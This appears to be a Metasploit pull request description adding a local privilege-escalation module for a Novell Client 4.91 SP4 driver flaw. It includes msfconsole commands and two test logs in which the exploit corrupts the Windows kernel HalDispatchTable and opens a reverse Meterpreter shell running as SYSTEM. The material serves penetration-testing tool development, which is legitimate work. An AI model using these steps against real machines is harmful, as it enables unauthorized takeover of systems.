Add module for OSVDB 46578

[jvazquez-r7]

Vulnerability in driver install with Novell Client 4.91 SP4. Tested successfully with Novell Client 4.91 SP4 on Windows XP SP3.

The software can be downloaded from: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~

It's a local exploit. In order to test the easier way is to get an unprivileged session (with a payload embedded on an exe and exploits/multi/handler). An use the exploit to escalate the session to SYSTEM:

msf> use exploit/multi/handler 
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 192.168.172.245
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.245:1122) at 2013-06-21 17:24:03 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > use exploit/windows/local/novell_client_nwfs 
msf exploit(novell_client_nwfs) > set session 2
session => 2
msf exploit(novell_client_nwfs) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.4:4444 
[*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\nwfs found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x3
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successfull!
[*] Storing the final payload on memory...
[+] Final payload successfully stored at 0xc0c0000
[*] Executing the payload...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy!
[*] Meterpreter session 3 opened (192.168.0.4:4444 -> 192.168.0.4:60186) at 2013-06-21 17:24:34 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 3...
msf exploit(novell_client_nwfs) > sessions

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  2   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.172.1:4444 -> 192.168.172.245:1122 (192.168.172.245)
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ JUAN-C0DE875735            192.168.0.4:4444 -> 192.168.0.4:60186 (192.168.0.4)

msf exploit(novell_client_nwfs) > 

[wchen-r7]

Works for me, merging:

msf exploit(novell_client_nwfs) > exploit

[*] Started reverse handler on 10.0.1.76:4444 
[*] Detecting the target system...
[*] "Windows XP (Build 2600, Service Pack 3)."
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\nwfs found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x3
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Storing the final payload on memory...
[+] Final payload successfully stored at 0xc0c0000
[*] Executing the payload...
[*] Sending stage (751104 bytes) to 10.0.1.76
[+] Enjoy!
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.76:52099) at 2013-06-21 21:51:33 -0500

meterpreter >